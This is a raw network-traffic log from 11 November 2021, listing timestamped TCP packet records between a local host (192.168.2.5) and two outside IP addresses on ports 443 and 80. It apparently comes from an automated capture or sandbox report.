                                                                                                                                                                                Nov 11, 2021 12:27:09.672476053 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.672487974 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.672499895 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.672503948 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.672512054 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.672527075 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.672538996 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.672544003 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.672548056 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.672640085 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.672650099 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.672671080 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.672796011 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.672806025 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.672820091 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.672830105 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.672837019 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.672851086 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.672936916 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.672945023 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.672959089 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.672975063 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.673058033 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.673067093 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.673099041 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.673105001 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.673110008 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.673116922 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.673253059 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.673270941 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.673280001 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.674635887 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.677158117 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.677170992 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.677185059 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.677448034 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.677464962 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.677469969 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.677489996 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.677498102 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.677767038 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.677776098 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.677797079 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.677804947 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.677834034 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.678097010 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.678105116 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.678117037 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.678123951 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.678153992 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.678162098 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.678173065 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.678178072 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.678343058 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.678354025 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.678543091 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.678554058 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.678575993 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.678586960 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.678592920 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.678755045 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.679595947 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.684154987 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.684176922 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.684210062 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.684218884 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.684386969 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.684402943 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.684426069 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.684478998 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.684489012 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.684508085 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.684540033 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.684547901 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.684607983 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.684619904 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.684637070 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.684679985 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.684693098 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.684710979 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.684758902 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.684772968 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.684815884 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.684835911 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.684844017 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.684863091 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.684894085 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.684900999 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.684952021 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.684967041 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685154915 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.685168982 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685184956 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685235023 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.685250044 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685262918 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685291052 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.685301065 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685314894 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.685326099 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685467958 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685514927 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.685528994 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685556889 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.685570002 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685580969 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685589075 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.685596943 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685667038 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685700893 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.685748100 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685770988 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685780048 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.685805082 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685823917 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.685838938 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685853004 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.685868025 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685914040 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.685931921 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685951948 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.685956955 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.685961962 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.685978889 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.685986996 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686002016 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686065912 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686065912 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686078072 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686089993 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686093092 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686105967 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686146021 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686158895 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686173916 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686194897 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686198950 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686213017 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686266899 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686276913 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686279058 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686296940 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686306953 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686320066 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686379910 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686383963 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686388016 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686410904 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686461926 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686482906 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686501026 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686505079 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686508894 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686531067 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686557055 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686573029 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686589956 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686605930 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686609983 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686634064 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686686993 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686708927 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686726093 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686731100 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686733961 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686757088 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686825037 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686844110 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686847925 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686855078 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686861992 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686928988 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686937094 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686949968 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.686953068 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.686968088 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.687025070 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.687031984 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.687036037 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.687042952 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.687057972 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.687079906 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.687114000 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.687125921 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.687141895 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.687160969 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.687169075 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.687206984 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.687298059 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.687331915 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.687354088 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.687372923 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.687378883 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.687386990 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.687406063 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.687434912 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.687452078 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.687474012 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.687473059 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.687480927 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.687500954 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.687515974 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.687530994 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.687541008 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.687652111 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.687781096 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.691358089 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.691493988 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.691586018 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.691704035 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.691740036 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.691812992 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.693315983 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.693339109 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.693372965 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.693413019 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.693438053 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.693458080 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.693459034 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:09.693496943 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.693532944 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.707246065 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.737401009 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.741419077 CET49848443192.168.2.5162.159.135.233
                                                                                                                                                                                Nov 11, 2021 12:27:09.741460085 CET44349848162.159.135.233192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.824489117 CET4984780192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.825248003 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.849539042 CET8049847178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.849596024 CET4984780192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.850471973 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.850557089 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.856651068 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.856761932 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.856884003 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.856970072 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.883456945 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.883508921 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.883692980 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.883712053 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.883727074 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.883743048 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.883799076 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.883800983 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.883815050 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.883830070 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.883843899 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.883851051 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.883852005 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.883860111 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.883905888 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.883922100 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.883934021 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.909204006 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909235001 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909254074 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909272909 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909291983 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909311056 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909329891 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909339905 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.909354925 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909363031 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909375906 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.909382105 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909389973 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909394026 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.909401894 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.909410000 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909429073 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909434080 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.909445047 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909465075 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909472942 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.909485102 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909502983 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.909506083 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909526110 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909544945 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.909559965 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.909581900 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.909590006 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.909622908 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.935486078 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935523033 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935544014 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935566902 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935589075 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935609102 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935631037 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935633898 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.935647964 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935663939 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935669899 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.935686111 CET8049850178.208.83.45192.168.2.5
